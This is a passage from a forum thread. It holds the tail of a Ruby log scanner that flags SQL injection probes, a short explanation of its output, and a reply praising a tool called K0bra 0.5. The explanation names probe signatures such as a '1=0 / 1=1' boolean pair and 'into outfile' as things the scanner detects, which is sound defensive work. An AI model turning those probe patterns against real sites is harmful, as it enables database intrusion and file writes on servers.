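if __FILE__ == $PROGRAM_NAME
  findings = scan_log(SAMPLE_LOG)
  findings.each { |f| puts "#{f[:severity].to_s.upcase.ljust(8)} #{f[:ip]} #{f[:hits].join(',')} #{f[:path]}" }
  boolean_pairs(findings).each { |ip, script| puts "boolean test pair from #{ip} against #{script}" }
end
```

The benign request from 198.51.100.4 produces no finding; the six probes from 203.0.113.7 escalate from low (the 1=0 / 1=1 pair) to critical (into outfile), and the pair correlation names that source and script.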

blackdrake

Re:[Ruby] K0bra 0.5

  • on: July 26, 2015, 07:15:11 am
What a great contribution, very good @Doddy, I'll try it later :D

Regards.
